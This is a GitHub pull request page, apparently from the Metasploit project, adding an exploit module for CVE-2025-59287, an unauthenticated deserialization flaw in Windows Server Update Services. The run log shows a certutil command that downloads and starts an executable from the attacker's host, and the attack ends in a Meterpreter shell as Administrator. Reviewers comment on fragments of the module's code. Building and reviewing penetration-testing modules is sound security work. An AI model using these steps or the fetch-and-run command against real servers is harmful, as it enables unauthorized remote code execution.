Skip to content

Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 12 commits into
base: master
Choose a base branch
from
Open

Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674

wants to merge 12 commits into from
+273 −0

Conversation

@msutovsky-r7
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 commented Nov 4, 2025
edited
Loading

This PR adds RCE module for unauthenticated deserialization in WSUS - CVE-2025-59287. Work in progress.

WSUS provides features for managing and distributing updates through a management console.
The CVE-2025-59287 is a remote code execution vulnerability in
this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
One way to run synchronization is to open the Windows Server Update Service app,
the other is to run the following command from PowerShell:

(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()

Verification Steps

  1. Setup WSUS on target server
  2. Do: use exploit/windows/http/wsus_deserialization_rce
  3. Do: set RHOSTS [target IP]
  4. Do: set LHOST [attacker IP]
  5. Do: set LPORT [attacker port]
  6. Do: run

Options

Scenarios

msf exploit(windows/http/wsus_deserialization_rce) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\nYFKgDXL.exe & start /B %TEMP%\nYFKgDXL.exe
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Getting server ID
[*] Getting authentication cookie
[*] Getting reporting cookie
[*] Trying to create malicious event
[*] Created malicious event, now waiting for WSUS to sync
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.161
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.161:49984) at 2025-11-04 12:27:00 +0100

meterpreter > sysinfo
Computer        : WIN2022__63DA
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN2022__63DA\Administrator

@github-actions
Copy link

github-actions bot commented Nov 4, 2025

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@msutovsky-r7 msutovsky-r7 marked this pull request as ready for review November 6, 2025 13:46
dledda-r7
dledda-r7 reviewed Nov 6, 2025
View reviewed changes
modules/exploits/windows/http/wsus_deserialization_rce.rb Outdated
formatter: :SoapFormatter
)

soap_body = %(<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
Copy link
Contributor

@dledda-r7 dledda-r7 Nov 6, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you please use HEREDOC here?

dledda-r7
dledda-r7 reviewed Nov 6, 2025
View reviewed changes
modules/exploits/windows/http/wsus_deserialization_rce.rb Outdated
})
return CheckCode::Safe('Target does not run WSUS') unless res&.code == 200 && res.headers['Server'] == 'Microsoft-IIS/10.0'

CheckCode::Appears('Target is probably running WSUS')
Copy link
Contributor

@dledda-r7 dledda-r7 Nov 6, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
CheckCode::Appears('Target is probably running WSUS')
CheckCode::Detected('Target is probably running WSUS')

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dledda-r7 dledda-r7 dledda-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

docs module

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@msutovsky-r7 @dledda-r7